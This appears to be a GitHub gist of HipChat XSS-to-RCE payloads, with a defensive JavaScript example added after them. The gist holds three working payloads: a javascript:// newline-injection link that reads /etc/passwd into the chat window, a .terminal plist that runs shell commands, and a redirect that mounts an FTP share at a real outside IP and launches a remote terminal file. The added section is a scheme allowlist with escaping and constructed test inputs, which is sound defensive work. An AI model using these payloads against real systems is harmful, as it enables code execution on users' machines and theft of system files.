@matt-

matt-/file_include.js Secret

Last active Feb 22, 2019
Hipchat XSS / RCE
javascript://comment[\r\n]
r=new XMLHttpRequest();
r.open('GET','file:///etc/passwd',false);
r.send(null);
document.getElementById('chat_text').innerHTML=r.responseText;
<dict>
<key>WindowTitle</key>
<string>Hacked!!!</string>
<key>CommandString</key>
<string>
cat /etc/passwd;
osascript -e 'display dialog "You just got hacked!"'
</string>
...
javascript://comment
location.href="ftp://anonymous:x@104.131.88.251/";
window.setTimeout(function(){location.href="file:///Volumes/104.131.88.251/hack.terminal";},5000)
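
An added defensive example, not part of the original gist and not HipChat's code: the payloads above rely on `javascript:`, `file:` and `ftp:` URLs, so, assuming they reach the client as link targets in a chat message, a renderer can allowlist schemes before it emits an anchor. `ALLOWED_SCHEMES`, `isSafeLinkTarget`, `escapeHtml`, `renderLink` and all sample inputs are constructed for illustration.

```javascript
// Added example: scheme allowlist plus output escaping for chat links.
// All names here are hypothetical; nothing below is taken from HipChat.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function isSafeLinkTarget(raw) {
  if (typeof raw !== 'string') return false;
  // Raw control characters (CR, LF, TAB, NUL, DEL) have no place in a link
  // target. The URL parser silently drops some of them, so reject first.
  if (/[\u0000-\u001f\u007f]/.test(raw)) return false;
  let url;
  try {
    url = new URL(raw); // no base argument: relative or scheme-less input throws
  } catch (e) {
    return false;
  }
  // The parser lowercases the scheme, so "JaVaScRiPt:" is compared correctly,
  // and "javascript://comment%0A..." still reports protocol "javascript:".
  return ALLOWED_SCHEMES.has(url.protocol);
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Emit an anchor only for allowlisted targets; otherwise fall back to inert text.
function renderLink(label, target) {
  if (!isSafeLinkTarget(target)) return escapeHtml(label);
  return '<a href="' + escapeHtml(target) + '" rel="noopener noreferrer">' +
    escapeHtml(label) + '</a>';
}

// Constructed sample inputs modelled on the schemes used in this gist.
const SAMPLES = [
  'https://example.com/a?b=1&c=2',
  'mailto:user@example.com',
  'javascript://comment%0Aalert(1)',
  'javascript://comment\r\nalert(1)',
  'JaVaScRiPt:alert(1)',
  'file:///etc/passwd',
  'ftp://anonymous:x@192.0.2.10/',
  '/relative/path',
];

function classifySamples() {
  return SAMPLES.map((s) => isSafeLinkTarget(s));
}
```

The same check belongs on any navigation the client performs on the user's behalf, not only on rendered anchors.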